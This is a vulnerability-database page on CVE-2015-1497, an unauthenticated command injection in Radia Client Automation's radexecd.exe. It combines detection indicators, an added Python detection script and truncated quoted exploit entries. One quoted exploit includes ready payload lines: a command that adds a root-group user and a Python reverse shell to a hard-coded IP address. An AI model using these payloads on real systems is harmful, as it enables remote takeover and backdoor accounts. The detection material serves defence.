CVE-2015-1497
Published: 2015-02-16
Priority: P1 (83) · critical · CVSS 2.0 score 10.0 · vector AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public exploit code available
EPSS: 75.12% (99.4th percentile)
radexecd.exe in Persistent Systems Radia Client Automation (RCA) 7.9, 8.1, 9.0, and 9.1 allows remote attackers to execute arbitrary commands via a crafted request to TCP port 3465.
Affected (4 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| persistent_systems | radia_client_automation | — | — |
| persistent_systems | radia_client_automation | — | — |
| persistent_systems | radia_client_automation | — | — |
| persistent_systems | radia_client_automation | — | — |
Detection & IOCs (extracted from sources)
- Detect unauthenticated TCP connections to port 3465 followed by a null-byte-delimited request containing the token 'hide hide'; this is the command injection trigger pattern used by all known exploits for CVE-2015-1497.
- Alert on any TCP stream to port 3465 whose payload contains the byte sequence 0x68 0x69 0x64 0x65 0x20 0x68 0x69 0x64 0x65 ('hide hide') followed by a tab character (0x09); this indicates command injection.
- On Windows targets, monitor for radexecd.exe spawning cmd.exe with net user, net localgroup, netsh firewall, or reg add commands; these are the post-exploitation commands injected via the vulnerability.
- On Linux targets, monitor for radexecd spawning sh -c with useradd or python reverse-shell one-liners as child processes.
- The Metasploit module uses a VBS cmdstager (flavor: vbs, linemax: 290) on Windows targets; detect creation of .vbs stager files in temp directories by processes descended from radexecd.exe.
- The exploit-db module (36206) drops a file named installservice.exe on an attacker-controlled SMB share and instructs the vulnerable host to fetch and execute it; monitor for radexecd.exe making outbound SMB (port 445) connections.
- The vulnerability exists because radexecd.exe does not authenticate execution requests by default; enabling authentication (RBAC/Remote Notify security controls) mitigates the issue without patching.
- The vendor advisory URL referenced in the Metasploit module points to Accelerite's guidance on enabling RBAC and Remote Notify security features as the recommended hardening measure.
- All four product versions (7.9, 8.1, 9.0, 9.1) are affected across both Windows and Linux platforms, so detection rules should not be scoped to a single OS or version.
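The indicators above, turned into runnable detection logic. This is an added example, not code from the page's sources, the exploit authors or any vendor: the event shapes (destination port plus raw payload, parent/child image plus command line, file path plus ancestor images) and the sample events are constructed assumptions standing in for whatever a sensor actually emits. It covers the network trigger ('hide hide' + TAB in a NUL-delimited request to TCP/3465), the Windows and Linux child-process rules, the .vbs stager write, and the outbound-SMB rule in one place.

```python
"""Constructed detection checks for CVE-2015-1497 (radexecd, TCP/3465).

Added example; event field names and sample events are assumptions, not
output of any real sensor.
"""
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass

RADEXECD_PORT = 3465
# 0x68 0x69 0x64 0x65 0x20 0x68 0x69 0x64 0x65 0x09 == b"hide hide\t"
TRIGGER = b"hide hide\t"
RADEXECD = {"radexecd.exe", "radexecd"}
SHELLS = {"cmd.exe", "sh", "bash"}
# post-exploitation commands named in the indicators
WINDOWS_CMDS = re.compile(r"\b(net\s+user|net\s+localgroup|netsh\s+firewall|reg\s+add)\b", re.I)
LINUX_CMDS = re.compile(r"\b(useradd|python\S*\s+-c)\b")


@dataclass
class Finding:
    rule: str
    detail: str


def _base(path: str) -> str:
    """Lower-cased basename; ntpath splits on both '\\' and '/'."""
    return ntpath.basename(path).lower()


def inspect_stream(dst_port: int, payload: bytes) -> list[Finding]:
    """Network rule: request to TCP/3465 carrying 'hide hide'+TAB in a NUL-delimited field."""
    if dst_port != RADEXECD_PORT:
        return []
    findings = []
    for field in payload.split(b"\x00"):
        if TRIGGER in field:
            injected = field.split(TRIGGER, 1)[1].decode("latin-1", "replace")
            findings.append(Finding("net-radexecd-trigger", f"injected command: {injected!r}"))
    return findings


def inspect_process(parent_image: str, image: str, cmdline: str) -> list[Finding]:
    """Host rule: radexecd spawning a shell; a second finding when known commands appear."""
    if _base(parent_image) not in RADEXECD or _base(image) not in SHELLS:
        return []
    findings = [Finding("proc-radexecd-shell", f"{_base(parent_image)} -> {_base(image)}")]
    m = WINDOWS_CMDS.search(cmdline) or LINUX_CMDS.search(cmdline)
    if m:
        findings.append(Finding("proc-radexecd-postexploit", f"command {m.group(0)!r}"))
    return findings


def inspect_file_write(ancestor_images: list[str], path: str) -> list[Finding]:
    """Host rule: .vbs written under a temp directory by a descendant of radexecd (VBS cmdstager)."""
    descended = any(_base(a) in RADEXECD for a in ancestor_images)
    low = path.replace("/", "\\").lower()
    if descended and low.endswith(".vbs") and ("\\temp\\" in low or "\\tmp\\" in low):
        return [Finding("file-radexecd-vbs-stager", path)]
    return []


def inspect_connection(image: str, dst_port: int) -> list[Finding]:
    """Network rule: radexecd itself opening outbound SMB (the EDB-36206 fetch-and-execute step)."""
    if _base(image) in RADEXECD and dst_port == 445:
        return [Finding("net-radexecd-outbound-smb", f"{_base(image)} -> tcp/{dst_port}")]
    return []


# Constructed sample events (not captured traffic or real telemetry).
SAMPLE_STREAM = b"\x00hide hide\tcmd.exe /c net user\x00"
SAMPLE_PROC = ("C:\\radia\\radexecd.exe", "C:\\Windows\\System32\\cmd.exe",
               "cmd.exe /c net localgroup administrators")
SAMPLE_FILE = (["radexecd.exe", "cmd.exe"], "C:\\Users\\u\\AppData\\Local\\Temp\\stage.vbs")


def run_samples() -> list[str]:
    """Rule names fired by the constructed samples, in order."""
    fired = inspect_stream(RADEXECD_PORT, SAMPLE_STREAM)
    fired += inspect_process(*SAMPLE_PROC)
    fired += inspect_file_write(*SAMPLE_FILE)
    fired += inspect_connection("radexecd.exe", 445)
    return [f.rule for f in fired]


if __name__ == "__main__":
    for name in run_samples():
        print(name)
```

The network rule keys on the TAB byte exactly as the second indicator states; a request with a plain space after 'hide hide' is not flagged by it, so the host-side rules are the safety net for variants. The shell-spawn finding fires on its own, since radexecd launching a shell is notable regardless of the command line, and the known post-exploitation commands only raise a second, higher-confidence finding.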
No detection rules found.
Exploit-DB: HP Client 9.1/9.0/8.1/7.9 - Command Injection
exploitdb·2016-10-10·CVSS 10.0·CRITICAL
---
# Exploit Title: [HP Client - Automation Command Injection]
# Date: [10/10/2016]
# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot
# Vendor Homepage: [Previously HP, now http://www.persistentsys.com/]
# Version: [Tested on version 7.9 but should work on 8.1, 9.0, 9.1 too]
# Tested on: [Windows 7 and CentOS release 6.7 (Final)]
# CVE : [CVE-2015-1497]
#Can run following commands on linux target
#Useradd Payload: hide hide sh -c ' useradd amiroot -p ID/JlXFIWowsE -g root'
#Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\
Exploit-DB: Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)
exploitdb·2015-02-27·CVSS 10.0·CRITICAL
---
# Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability
# Date: 2014-10-01
# Exploit Author: Ben Turner
# Vendor Homepage: Previously HP, now http://www.persistentsys.com/
# Version: 7.9, 8.1, 9.0, 9.1
# Tested on: Windows XP, Windows 7, Server 2003 and Server 2008
# CVE-2015-1497
# CVSS: 10
require 'msf/core'
class Metasploit3 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability',
'Description' => %Q{
This module exploits PS Client Automation, by sending a remote service install and creating a callback payload.
},
'Author' => [ 'Ben Turner'
Exploit-DB: HP Client - Automation Command Injection (Metasploit)
exploitdb·2015-02-24
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'HP Client Automation Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability on HP Client Automation, distributed
actually as Persistent Systems Client Automation. The vulnerability exists in the Notify
Daemon (radexecd.exe), which doesn't authenticate execution requests by default.
This module has been tested successfully on HP Client Automation 9.00 over Windows 2003 SP2
and CentOS 5.
},
'Author' =>
[
'Ben Turner', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '201
Metasploit: HP Client Automation Command Injection
This module exploits a command injection vulnerability on HP Client Automation, distributed actually as Persistent Systems Client Automation. The vulnerability exists in the Notify Daemon (radexecd.exe), which doesn't authenticate execution requests by default. This module has been tested successfully on HP Client Automation 9.00 on Windows 2003 SP2 and CentOS 5.
No writeups or analysis indexed.
References
- http://osvdb.org/show/osvdb/118382
- http://packetstormsecurity.com/files/130459/HP-Client-Automation-Command-Injection.html
- http://www.exploit-db.com/exploits/36169
- http://www.exploit-db.com/exploits/36206
- http://www.securityfocus.com/bid/72612
- http://www.zerodayinitiative.com/advisories/ZDI-15-038/
- https://support.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features
- https://www.exploit-db.com/exploits/40491/
Published: 2015-02-16